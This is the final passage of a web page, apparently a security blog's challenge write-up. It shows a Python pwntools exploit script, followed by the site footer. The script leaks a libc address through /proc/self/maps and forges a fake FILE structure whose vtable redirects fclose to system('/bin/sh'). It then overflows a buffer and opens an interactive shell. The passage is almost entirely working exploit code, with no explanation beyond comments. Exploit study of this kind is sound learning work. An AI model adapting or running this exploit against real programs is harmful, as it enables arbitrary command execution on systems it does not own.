</span></span><span class="line"><span class="cl"><span class="n">s</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">,</span> <span class="n">r</span><span class="o">=</span><span class="s2">&#34;&#34;</span> <span class="p">:</span> \
</span></span><span class="line"><span class="cl">  <span class="n">p</span><span class="o">.</span><span class="n">sendafter</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">x</span><span class="p">)</span> <span class="k">if</span> <span class="n">r</span> <span class="k">else</span> <span class="n">p</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">sl</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">x</span><span class="p">,</span> <span class="n">r</span><span class="o">=</span><span class="s2">&#34;&#34;</span> <span class="p">:</span> \
</span></span><span class="line"><span class="cl">  <span class="n">p</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">x</span><span class="p">)</span> <span class="k">if</span> <span class="n">r</span> <span class="k">else</span> <span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">option_open</span><span class="p">(</span><span class="n">path</span> <span class="p">:</span> <span class="nb">str</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">  <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;open(</span><span class="si">{</span><span class="n">path</span><span class="si">}</span><span class="s2">)&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">  <span class="n">sl</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;1&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;choice :&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">  <span class="n">sl</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;see :&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">option_read</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">  <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s2">&#34;read()&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">  <span class="n">sl</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;2&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;choice :&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">option_write</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">  <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s2">&#34;write()&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">  <span class="n">sl</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;3&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;choice :&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">option_close</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">  <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s2">&#34;close()&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">  <span class="n">sl</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;4&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;choice :&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">option_exit</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">  <span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s2">&#34;exit()&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">  <span class="n">sl</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;5&#39;</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;choice :&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">menu</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;---------------MENU---------------&#39;</span>
</span></span><span class="line"><span class="cl"><span class="n">offset</span> <span class="o">=</span> <span class="mi">32</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">pause</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="c1"># leak libc</span>
</span></span><span class="line"><span class="cl"><span class="n">option_open</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;/proc/self/maps&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">option_read</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="n">option_read</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="n">option_write</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="n">p</span><span class="o">.</span><span class="n">recvline</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="n">libc_leak</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">p</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8</span><span class="p">),</span> <span class="mi">16</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">system_addr</span> <span class="o">=</span> <span class="n">libc_leak</span> <span class="o">+</span> <span class="n">libc</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s1">&#39;system&#39;</span><span class="p">]</span>
</span></span><span class="line"><span class="cl"><span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s2">&#34;Leaked libc base address: </span><span class="si">%#lx</span><span class="s2">&#34;</span> <span class="o">%</span> <span class="n">libc_leak</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s2">&#34;Leaked system address: </span><span class="si">%#lx</span><span class="s2">&#34;</span> <span class="o">%</span> <span class="n">system_addr</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># construct payload</span>
</span></span><span class="line"><span class="cl"><span class="n">fp</span> <span class="o">=</span> <span class="n">FileStructure</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="n">fp</span><span class="o">.</span><span class="n">flags</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;/bin&#39;</span>
</span></span><span class="line"><span class="cl"><span class="n">fp</span><span class="o">.</span><span class="n">_IO_read_ptr</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;/sh</span><span class="se">\x00</span><span class="s1">&#39;</span>
</span></span><span class="line"><span class="cl"><span class="n">fp</span><span class="o">.</span><span class="n">_lock</span> <span class="o">=</span> <span class="mh">0x804b400</span>        <span class="c1"># valid address eval to NULL (as to not lock)</span>
</span></span><span class="line"><span class="cl"><span class="n">fp</span><span class="o">.</span><span class="n">vtable</span> <span class="o">=</span> <span class="p">(</span><span class="mh">0x804b284</span> <span class="o">+</span> <span class="mh">0x98</span><span class="p">)</span> <span class="o">-</span> <span class="mi">4</span><span class="o">*</span><span class="mi">17</span> <span class="c1"># calculate system address</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="o">*</span><span class="n">offset</span>       <span class="c1"># offset</span>
</span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">+=</span> <span class="n">p32</span><span class="p">(</span><span class="mh">0x804b284</span><span class="p">)</span>   <span class="c1"># fake _IO_FILE structure</span>
</span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">+=</span> <span class="nb">bytes</span><span class="p">(</span><span class="n">fp</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">+=</span> <span class="n">p32</span><span class="p">(</span><span class="n">system_addr</span><span class="p">)</span> <span class="c1"># vtable fclose(fp)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">option_exit</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">p</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span>
</span></span></code></pre></div>
            </div>
        </article>
    </main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
<a href="https://github.com/intranautic" target="_blank" rel="noopener noreferrer me" title="Github">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path
        d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22">
    </path>
</svg>
</a>
<a href="https://twitter.com/intranautic" target="_blank" rel="noopener noreferrer me" title="Twitter">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path
        d="M23 3a10.9 10.9 0 0 1-3.14 1.53 4.48 4.48 0 0 0-7.86 3v1A10.66 10.66 0 0 1 3 4s-4 9 5 13a11.64 11.64 0 0 1-7 2c9 5 20 0 20-11.5a4.5 4.5 0 0 0-.08-.83A7.72 7.72 0 0 0 23 3z">
    </path>
</svg>
</a>
<a href="https://keybase.io/intranautic" target="_blank" rel="noopener noreferrer me" title="Keybase">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 71 76.3" version="1.1" fill="currentColor" stroke="none">
    <path
        d="M6.68 73.99c-.6-1.3-1.4-3.1-1.8-4l-.6-1.7-2 2.2-2 2.2-.2-4.2c-.3-6 .2-12.2 1.2-16.6 2.3-9.8 9.5-18.7 18.8-23.4l2.1-1-.5-1.5c-.3-.8-.6-2.5-.7-3.6l-.2-2.1-2.1-.2c-3.2-.3-4.9-1.2-6-3.5-.6-1.2-.6-1.4-.4-4.6.2-4.2.5-5.1 1.8-6.5 1.6-1.8 2.7-2.1 6.7-1.9 2.9.2 3.5.3 4.8.9.8.4 1.5.8 1.6.8.1 0 1-1.1 2.1-2.6l1.9-2.7 1.2.7c.7.4 1.5.9 1.9 1.1l.7.4-.6 1.5c-.3.8-.7 2.2-.8 2.9l-.2 1.4 1.7.2c6.1.6 10.7 4.3 12.4 9.9.5 1.8.5 5.3 0 7-.5 1.6-.5 1.7-.1 1.7.7 0 5.4 2.3 7.3 3.5 3.7 2.4 8 6.6 10.4 10.2 4.5 6.7 6.4 14 5.6 22-.4 4.8-1.3 8.6-2.9 12.3l-.6 1.4h-5l1.2-2.4c1.3-2.6 2.3-6.2 2.8-9.4.3-2.2.4-8.2.1-9.3l-.2-.7-1.3 1.4c-3.2 3.5-7.9 4.5-14.2 2.8-5.4-1.4-7.6-1.7-12.7-1.7-3.9 0-5.2.1-7.3.6-5.8 1.3-9.9 3.2-15.6 7.3-2.1 1.5-3.8 2.7-3.9 2.7-.1 0 .2-1 .6-2.3.4-1.3 1.1-3.4 1.5-4.8l.8-2.5-.9.9c-.5.5-1.9 1.9-3.1 3.2l-2.1 2.3.5 1.9c.6 2.5 2 5.6 3.5 7.9.6 1 1.1 1.8 1.1 1.9s-1.2.1-2.6.1h-2.6l-1.1-2.1zm8.8-24.2c4.8-5.1 8.7-9.2 8.8-9.2.1.1-.4 1.6-.9 3.3-3.3 10.4-4 12.4-3.9 12.5 0 0 1.2-.4 2.5-.9 8.5-3.7 18.4-4.2 28.9-1.4 4.7 1.2 6.5 1.2 8.8 0 1.3-.7 1.8-1.1 2.4-2.1 1.1-1.7 1.2-4.1.5-6.3-1.7-4.8-8.3-11-14.5-13.7-3.2-1.4-3.4-1.4-4.1-.7l-.6.6 2.6 3.2c1.4 1.7 2.9 3.6 3.1 4.1.6 1.2.7 3.1.1 4.3-.8 1.7-3.2 2.9-5.1 2.5-.8-.2-1.1-.1-1.9.5-2.2 1.6-4.6 1.2-6.6-1.2-1.6-1.8-2-2.7-2.1-4.5 0-.9-.3-2-.5-2.4-.3-.6-.4-1.3-.4-2.2l.1-1.4-1.3-.3c-1.8-.5-3.9-1.5-5.1-2.4-.6-.4-1.1-.8-1.3-.8s-1.5.6-2.9 1.3c-9.7 5-16 14.3-17 24.8-.1 1-.2 2.3-.3 2.8l-.1.9 1.1-1.1c.5-.5 4.9-5.1 9.7-10.2zm25.9-7.4c.9-.7 1.7-1.3 1.9-1.3.1 0 .4.3.7.7.5.8 1.4.8 1.8.1.3-.5.3-.6-5.6-7.8-3.5-4.3-4.2-5-4.7-5-1.2.1-.9 1 1 3.3l1.8 2.2-1 .8c-1.1 1-1.2 1.2-.5 1.8.5.5.6.4 1.6-.3l1.1-.7.7.6c.4.3.6.8.6.9 0 .2-.8.9-1.7 1.7-.9.7-1.6 1.5-1.6 1.7 0 .3.5 1.1 1.4 2.2.3.6.8.4 2.5-.9zm-10.3-14.2c.6-1.8 2.6-3.2 4.6-3.2 1.1 0 2.7.9 3.8 2.1l1 1.2.9-1.1c2.5-2.8 2.8-6.7.8-10.1-1.5-2.5-4.3-4-8.2-4.4-2.1-.2-2.6-.4-3.7-1.5l-.8-.8-.4.6c-.8 1.2-2.5 5.1-3 6.6-.7 2.3-.4 5.9.5 7.7.9 1.7 3.3 4 4 3.7.1.1.3-.3.5-.8zm-8.9-13.6c.2-.5.7-1.8 1.2-2.8.5-1 .9-2 .9-2.3 0-.9-1-1.3-3.7-1.5-2.4-.2-2.6-.1-3.1.4-.4.4-.6.9-.6 1.6 0 .6-.1 1.7-.2 2.6-.2 2.1.1 2.5 2.2 2.8 3.1.2 3 .2 3.3-.8zm-3.1-2.4c0-1.7.2-1.9 1.6-1.9h1.3v2.8h-2.8v-.9zm6.3 58.3c-.6-.6-.8-1-.8-2 0-1.9 1.1-3 2.9-3 1.7 0 2.9 1.2 2.9 2.9 0 1.8-1.1 2.8-3 2.9-1 0-1.4-.2-2-.8zm19.3.3a2.93 2.93 0 011.8-5.3c1.8 0 2.8 1.1 2.9 3 0 1.1-.1 1.4-.8 2s-1 .8-2 .8c-.9 0-1.5-.2-1.9-.5z" />
</svg>
</a>
<a href="https://www.youtube.com/channel/UCHeF3c8S4R031ENxz6FWj-w" target="_blank" rel="noopener noreferrer me" title="Youtube">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path
        d="M22.54 6.42a2.78 2.78 0 0 0-1.94-2C18.88 4 12 4 12 4s-6.88 0-8.6.46a2.78 2.78 0 0 0-1.94 2A29 29 0 0 0 1 11.75a29 29 0 0 0 .46 5.33A2.78 2.78 0 0 0 3.4 19c1.72.46 8.6.46 8.6.46s6.88 0 8.6-.46a2.78 2.78 0 0 0 1.94-2 29 29 0 0 0 .46-5.25 29 29 0 0 0-.46-5.33z">
    </path>
    <polygon points="9.75 15.02 15.5 11.75 9.75 8.48 9.75 15.02"></polygon>
</svg>
</a>
<a href="/pgp.txt" target="_blank" rel="noopener noreferrer me" title="Pgp">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path d="M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71"></path>
    <path d="M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71"></path>
</svg>
</a>
<a href="/index.xml" target="_blank" rel="noopener noreferrer me" title="Rss">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path d="M4 11a9 9 0 0 1 9 9" />
    <path d="M4 4a16 16 0 0 1 16 16" />
    <circle cx="5" cy="19" r="1" />
</svg>
</a></div>
    <small class="footer_copyright">
        © 2023 Intranautic.
    </small>
</footer>

<script src="https://intranautic.com/js/themeSwitchnMenu.min.2a402288242b6930b175a0722c267e2353055739b3975834df35e56d00dd8f50.js"></script></body>
</html>
